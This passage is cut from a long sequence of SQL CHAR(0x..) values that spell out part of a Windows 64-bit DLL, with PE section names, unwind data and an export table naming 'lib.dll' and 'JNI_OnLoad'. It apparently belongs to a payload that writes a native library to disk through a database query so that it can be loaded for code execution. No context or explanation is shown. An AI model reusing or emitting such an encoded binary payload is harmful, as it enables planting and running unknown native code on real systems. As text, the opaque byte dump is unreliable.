7),CHAR(0x00),CHAR(0x09),CHAR(0xb6),CHAR(0x00),CHAR(0x0a),CHAR(0x03),CHAR(0xb9),CHAR(0x00),CHAR(0x0e),CHAR(0x02),CHAR(0x00),CHAR(0xc0),CHAR(0x00),CHAR(0x14),CHAR(0xb9),CHAR(0x00),CHAR(0x16),CHAR(0x01),CHAR(0x00),CHAR(0x2a),CHAR(0xb9),CHAR(0x00),CHAR(0x1a),CHAR(0x02),CHAR(0x00),CHAR(0xb6),CHAR(0x00),CHAR(0x20),CHAR(0xb0),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x27),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x06),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x03),CHAR(0x00),CHAR(0x29),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x04),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x2a),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x2c),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x02),CHAR(0x00),CHAR(0x2d),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x50),CHAR(0x40),CHAR(0x00),CHAR(0x80),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xf0),CHAR(0x40),CHAR(0x00),CHAR(0x80),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xff),CHAR(0xff),CHAR(0xff),CHAR(0xff),CHAR(0xff),CHAR(0xff),CHAR(0xff),CHAR(0xff),CHAR(0xff),CHAR(0xff),CHAR(0xff),CHAR(0xff),CHAR(0xff),CHAR(0xff),CHAR(0xff),CHAR(0xff),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x1c),CHAR(0xe7),CHAR(0xa7),CHAR(0x5e),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x0d),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x18),CHAR(0x02),CHAR(0x00),CHAR(0x00),CHAR(0x40),CHAR(0x36),CHAR(0x00),CHAR(0x00),CHAR(0x40),CHAR(0x1c),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x30),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x08),CHAR(0x40),CHAR(0x00),CHAR(0x80),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0x30),CHAR(0x00),CHAR(0x80),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xf8),CHAR(0x30),CHAR(0x00),CHAR(0x80),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xf0),CHAR(0x30),CHAR(0x00),CHAR(0x80),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x31),CHAR(0x00),CHAR(0x80),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x08),CHAR(0x31),CHAR(0x00),CHAR(0x80),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x10),CHAR(0x00),CHAR(0x00),CHAR(0xf0),CHAR(0x0f),CHAR(0x00),CHAR(0x00),CHAR(0x2e),CHAR(0x74),CHAR(0x65),CHAR(0x78),CHAR(0x74),CHAR(0x24),CHAR(0x6d),CHAR(0x6e),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xf0),CHAR(0x1f),CHAR(0x00),CHAR(0x00),CHAR(0x12),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x2e),CHAR(0x74),CHAR(0x65),CHAR(0x78),CHAR(0x74),CHAR(0x24),CHAR(0x6d),CHAR(0x6e),CHAR(0x24),CHAR(0x30),CHAR(0x30),CHAR(0x00),CHAR(0x02),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0x92),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x2e),CHAR(0x74),CHAR(0x65),CHAR(0x78),CHAR(0x74),CHAR(0x24),CHAR(0x78),CHAR(0x00),CHAR(0x00),CHAR(0x30),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x2e),CHAR(0x69),CHAR(0x64),CHAR(0x61),CHAR(0x74),CHAR(0x61),CHAR(0x24),CHAR(0x35),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0x30),CHAR(0x00),CHAR(0x00),CHAR(0x28),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x2e),CHAR(0x30),CHAR(0x30),CHAR(0x63),CHAR(0x66),CHAR(0x67),CHAR(0x00),CHAR(0x00),CHAR(0x10),CHAR(0x31),CHAR(0x00),CHAR(0x00),CHAR(0x08),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x2e),CHAR(0x43),CHAR(0x52),CHAR(0x54),CHAR(0x24),CHAR(0x58),CHAR(0x43),CHAR(0x41),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x18),CHAR(0x31),CHAR(0x00),CHAR(0x00),CHAR(0x08),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x2e),CHAR(0x43),CHAR(0x52),CHAR(0x54),CHAR(0x24),CHAR(0x58),CHAR(0x43),CHAR(0x5a),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x20),CHAR(0x31),CHAR(0x00),CHAR(0x00),CHAR(0x08),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x2e),CHAR(0x43),CHAR(0x52),CHAR(0x54),CHAR(0x24),CHAR(0x58),CHAR(0x49),CHAR(0x41),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x28),CHAR(0x31),CHAR(0x00),CHAR(0x00),CHAR(0x08),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x2e),CHAR(0x43),CHAR(0x52),CHAR(0x54),CHAR(0x24),CHAR(0x58),CHAR(0x49),CHAR(0x5a),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x30),CHAR(0x31),CHAR(0x00),CHAR(0x00),CHAR(0x08),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x2e),CHAR(0x43),CHAR(0x52),CHAR(0x54),CHAR(0x24),CHAR(0x58),CHAR(0x50),CHAR(0x41),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x38),CHAR(0x31),CHAR(0x00),CHAR(0x00),CHAR(0x08),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x2e),CHAR(0x43),CHAR(0x52),CHAR(0x54),CHAR(0x24),CHAR(0x58),CHAR(0x50),CHAR(0x5a),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x40),CHAR(0x31),CHAR(0x00),CHAR(0x00),CHAR(0x08),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x2e),CHAR(0x43),CHAR(0x52),CHAR(0x54),CHAR(0x24),CHAR(0x58),CHAR(0x54),CHAR(0x41),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x31),CHAR(0x00),CHAR(0x00),CHAR(0x08),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x2e),CHAR(0x43),CHAR(0x52),CHAR(0x54),CHAR(0x24),CHAR(0x58),CHAR(0x54),CHAR(0x5a),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x50),CHAR(0x31),CHAR(0x00),CHAR(0x00),CHAR(0xf0),CHAR(0x04),CHAR(0x00),CHAR(0x00),CHAR(0x2e),CHAR(0x72),CHAR(0x64),CHAR(0x61),CHAR(0x74),CHAR(0x61),CHAR(0x00),CHAR(0x00),CHAR(0x40),CHAR(0x36),CHAR(0x00),CHAR(0x00),CHAR(0x18),CHAR(0x02),CHAR(0x00),CHAR(0x00),CHAR(0x2e),CHAR(0x72),CHAR(0x64),CHAR(0x61),CHAR(0x74),CHAR(0x61),CHAR(0x24),CHAR(0x7a),CHAR(0x7a),CHAR(0x7a),CHAR(0x64),CHAR(0x62),CHAR(0x67),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x58),CHAR(0x38),CHAR(0x00),CHAR(0x00),CHAR(0x08),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x2e),CHAR(0x72),CHAR(0x74),CHAR(0x63),CHAR(0x24),CHAR(0x49),CHAR(0x41),CHAR(0x41),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x60),CHAR(0x38),CHAR(0x00),CHAR(0x00),CHAR(0x08),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x2e),CHAR(0x72),CHAR(0x74),CHAR(0x63),CHAR(0x24),CHAR(0x49),CHAR(0x5a),CHAR(0x5a),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x68),CHAR(0x38),CHAR(0x00),CHAR(0x00),CHAR(0x08),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x2e),CHAR(0x72),CHAR(0x74),CHAR(0x63),CHAR(0x24),CHAR(0x54),CHAR(0x41),CHAR(0x41),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x70),CHAR(0x38),CHAR(0x00),CHAR(0x00),CHAR(0x08),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x2e),CHAR(0x72),CHAR(0x74),CHAR(0x63),CHAR(0x24),CHAR(0x54),CHAR(0x5a),CHAR(0x5a),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x78),CHAR(0x38),CHAR(0x00),CHAR(0x00),CHAR(0xa8),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x2e),CHAR(0x78),CHAR(0x64),CHAR(0x61),CHAR(0x74),CHAR(0x61),CHAR(0x00),CHAR(0x00),CHAR(0x20),CHAR(0x3a),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x2e),CHAR(0x65),CHAR(0x64),CHAR(0x61),CHAR(0x74),CHAR(0x61),CHAR(0x00),CHAR(0x00),CHAR(0x68),CHAR(0x3a),CHAR(0x00),CHAR(0x00),CHAR(0x3c),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x2e),CHAR(0x69),CHAR(0x64),CHAR(0x61),CHAR(0x74),CHAR(0x61),CHAR(0x24),CHAR(0x32),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xa4),CHAR(0x3a),CHAR(0x00),CHAR(0x00),CHAR(0x14),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x2e),CHAR(0x69),CHAR(0x64),CHAR(0x61),CHAR(0x74),CHAR(0x61),CHAR(0x24),CHAR(0x33),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xb8),CHAR(0x3a),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x2e),CHAR(0x69),CHAR(0x64),CHAR(0x61),CHAR(0x74),CHAR(0x61),CHAR(0x24),CHAR(0x34),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xa0),CHAR(0x3b),CHAR(0x00),CHAR(0x00),CHAR(0x90),CHAR(0x02),CHAR(0x00),CHAR(0x00),CHAR(0x2e),CHAR(0x69),CHAR(0x64),CHAR(0x61),CHAR(0x74),CHAR(0x61),CHAR(0x24),CHAR(0x36),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x40),CHAR(0x00),CHAR(0x00),CHAR(0x40),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x2e),CHAR(0x64),CHAR(0x61),CHAR(0x74),CHAR(0x61),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x40),CHAR(0x40),CHAR(0x00),CHAR(0x00),CHAR(0xf8),CHAR(0x05),CHAR(0x00),CHAR(0x00),CHAR(0x2e),CHAR(0x62),CHAR(0x73),CHAR(0x73),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x50),CHAR(0x00),CHAR(0x00),CHAR(0xc8),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x2e),CHAR(0x70),CHAR(0x64),CHAR(0x61),CHAR(0x74),CHAR(0x61),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x19),CHAR(0x2a),CHAR(0x09),CHAR(0x00),CHAR(0x18),CHAR(0x74),CHAR(0x6d),CHAR(0x00),CHAR(0x18),CHAR(0x64),CHAR(0x6c),CHAR(0x00),CHAR(0x18),CHAR(0x34),CHAR(0x6b),CHAR(0x00),CHAR(0x18),CHAR(0x01),CHAR(0x68),CHAR(0x00),CHAR(0x11),CHAR(0xe0),CHAR(0x00),CHAR(0x00),CHAR(0x2c),CHAR(0x12),CHAR(0x00),CHAR(0x00),CHAR(0x30),CHAR(0x03),CHAR(0x00),CHAR(0x00),CHAR(0x01),CHAR(0x02),CHAR(0x01),CHAR(0x00),CHAR(0x02),CHAR(0x30),CHAR(0x00),CHAR(0x00),CHAR(0x01),CHAR(0x04),CHAR(0x01),CHAR(0x00),CHAR(0x04),CHAR(0x42),CHAR(0x00),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x11),CHAR(0x15),CHAR(0x08),CHAR(0x00),CHAR(0x15),CHAR(0x74),CHAR(0x09),CHAR(0x00),CHAR(0x15),CHAR(0x64),CHAR(0x07),CHAR(0x00),CHAR(0x15),CHAR(0x34),CHAR(0x06),CHAR(0x00),CHAR(0x15),CHAR(0x32),CHAR(0x11),CHAR(0xe0),CHAR(0xa6),CHAR(0x1f),CHAR(0x00),CHAR(0x00),CHAR(0x02),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x6c),CHAR(0x13),CHAR(0x00),CHAR(0x00),CHAR(0xdb),CHAR(0x13),CHAR(0x00),CHAR(0x00),CHAR(0x02),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x3e),CHAR(0x14),CHAR(0x00),CHAR(0x00),CHAR(0x49),CHAR(0x14),CHAR(0x00),CHAR(0x00),CHAR(0x02),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x01),CHAR(0x06),CHAR(0x02),CHAR(0x00),CHAR(0x06),CHAR(0x32),CHAR(0x02),CHAR(0x50),CHAR(0x11),CHAR(0x0a),CHAR(0x04),CHAR(0x00),CHAR(0x0a),CHAR(0x34),CHAR(0x08),CHAR(0x00),CHAR(0x0a),CHAR(0x52),CHAR(0x06),CHAR(0x70),CHAR(0xa6),CHAR(0x1f),CHAR(0x00),CHAR(0x00),CHAR(0x04),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x83),CHAR(0x14),CHAR(0x00),CHAR(0x00),CHAR(0xa2),CHAR(0x14),CHAR(0x00),CHAR(0x00),CHAR(0x19),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x78),CHAR(0x14),CHAR(0x00),CHAR(0x00),CHAR(0xba),CHAR(0x14),CHAR(0x00),CHAR(0x00),CHAR(0x32),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xc3),CHAR(0x14),CHAR(0x00),CHAR(0x00),CHAR(0xce),CHAR(0x14),CHAR(0x00),CHAR(0x00),CHAR(0x19),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xc3),CHAR(0x14),CHAR(0x00),CHAR(0x00),CHAR(0xcf),CHAR(0x14),CHAR(0x00),CHAR(0x00),CHAR(0x32),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x09),CHAR(0x1a),CHAR(0x06),CHAR(0x00),CHAR(0x1a),CHAR(0x34),CHAR(0x0f),CHAR(0x00),CHAR(0x1a),CHAR(0x72),CHAR(0x16),CHAR(0xe0),CHAR(0x14),CHAR(0x70),CHAR(0x13),CHAR(0x60),CHAR(0xa6),CHAR(0x1f),CHAR(0x00),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x05),CHAR(0x15),CHAR(0x00),CHAR(0x00),CHAR(0xed),CHAR(0x15),CHAR(0x00),CHAR(0x00),CHAR(0x46),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0xed),CHAR(0x15),CHAR(0x00),CHAR(0x00),CHAR(0x01),CHAR(0x06),CHAR(0x02),CHAR(0x00),CHAR(0x06),CHAR(0x52),CHAR(0x02),CHAR(0x50),CHAR(0x01),CHAR(0x0f),CHAR(0x06),CHAR(0x00),CHAR(0x0f),CHAR(0x64),CHAR(0x07),CHAR(0x00),CHAR(0x0f),CHAR(0x34),CHAR(0x06),CHAR(0x00),CHAR(0x0f),CHAR(0x32),CHAR(0x0b),CHAR(0x70),CHAR(0x01),CHAR(0x09),CHAR(0x01),CHAR(0x00),CHAR(0x09),CHAR(0x62),CHAR(0x00),CHAR(0x00),CHAR(0x01),CHAR(0x08),CHAR(0x04),CHAR(0x00),CHAR(0x08),CHAR(0x72),CHAR(0x04),CHAR(0x70),CHAR(0x03),CHAR(0x60),CHAR(0x02),CHAR(0x30),CHAR(0x01),CHAR(0x06),CHAR(0x02),CHAR(0x00),CHAR(0x06),CHAR(0x32),CHAR(0x02),CHAR(0x30),CHAR(0x01),CHAR(0x0d),CHAR(0x04),CHAR(0x00),CHAR(0x0d),CHAR(0x34),CHAR(0x09),CHAR(0x00),CHAR(0x0d),CHAR(0x32),CHAR(0x06),CHAR(0x50),CHAR(0x09),CHAR(0x04),CHAR(0x01),CHAR(0x00),CHAR(0x04),CHAR(0x22),CHAR(0x22),CHAR(0x00),CHAR(0x00),CHAR(0xa6),CHAR(0x1f),CHAR(0x00),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x23),CHAR(0x1b),CHAR(0x00),CHAR(0x00),CHAR(0xab),CHAR(0x1b),CHAR(0x00),CHAR(0x00),CHAR(0x7c),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0xab),CHAR(0x1b),CHAR(0x00),CHAR(0x00),CHAR(0x01),CHAR(0x02),CHAR(0x01),CHAR(0x00),CHAR(0x02),CHAR(0x50),CHAR(0x00),CHAR(0x00),CHAR(0x01),CHAR(0x14),CHAR(0x08),CHAR(0x00),CHAR(0x14),CHAR(0x64),CHAR(0x08),CHAR(0x00),CHAR(0x14),CHAR(0x54),CHAR(0x07),CHAR(0x00),CHAR(0x14),CHAR(0x34),CHAR(0x06),CHAR(0x00),CHAR(0x14),CHAR(0x32),CHAR(0x10),CHAR(0x70),CHAR(0x01),CHAR(0x15),CHAR(0x05),CHAR(0x00),CHAR(0x15),CHAR(0x34),CHAR(0xba),CHAR(0x00),CHAR(0x15),CHAR(0x01),CHAR(0xb8),CHAR(0x00),CHAR(0x06),CHAR(0x50),CHAR(0x00),CHAR(0x00),CHAR(0x01),CHAR(0x0a),CHAR(0x04),CHAR(0x00),CHAR(0x0a),CHAR(0x34),CHAR(0x06),CHAR(0x00),CHAR(0x0a),CHAR(0x32),CHAR(0x06),CHAR(0x70),CHAR(0x01),CHAR(0x0f),CHAR(0x06),CHAR(0x00),CHAR(0x0f),CHAR(0x64),CHAR(0x06),CHAR(0x00),CHAR(0x0f),CHAR(0x34),CHAR(0x05),CHAR(0x00),CHAR(0x0f),CHAR(0x12),CHAR(0x0b),CHAR(0x70),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xff),CHAR(0xff),CHAR(0xff),CHAR(0xff),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x52),CHAR(0x3a),CHAR(0x00),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x3a),CHAR(0x00),CHAR(0x00),CHAR(0x4c),CHAR(0x3a),CHAR(0x00),CHAR(0x00),CHAR(0x50),CHAR(0x3a),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x10),CHAR(0x00),CHAR(0x00),CHAR(0x5a),CHAR(0x3a),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x6c),CHAR(0x69),CHAR(0x62),CHAR(0x2e),CHAR(0x64),CHAR(0x6c),CHAR(0x6c),CHAR(0x00),CHAR(0x4a),CHAR(0x4e),CHAR(0x49),CHAR(0x5f),CHAR(0x4f),CHAR(0x6e),CHAR(0x4c),CHAR(0x6f),CHAR(0x61),CHAR(0x64),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xb8),CHAR(0x3a),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x06),CHAR(0x3d),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x30),CHAR(0x00),CHAR(0x00),CHAR(0x38),CHAR(0x3b),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x56),CHAR(0x3d),CHAR(0x00),CHAR(0x00),CHAR(0x80),CHAR(0x30),CHAR(0x00),CHAR(0x00),CHAR(0x58),CHAR(0x3b),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x0e),CHAR(0x3e),CHAR(0x00),CHAR(0x00),CHAR(0xa0),CHAR(0x30),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xa0),CHAR(0x3b),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xb4),CHAR(0x3b),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xce),CHAR(0x3b),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xe2),CHAR(0x3b),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xfe),CHAR(0x3b),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x1c),CHAR(0x3c),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x30),CHAR(0x3c),CHAR(0x00),CHAR(0x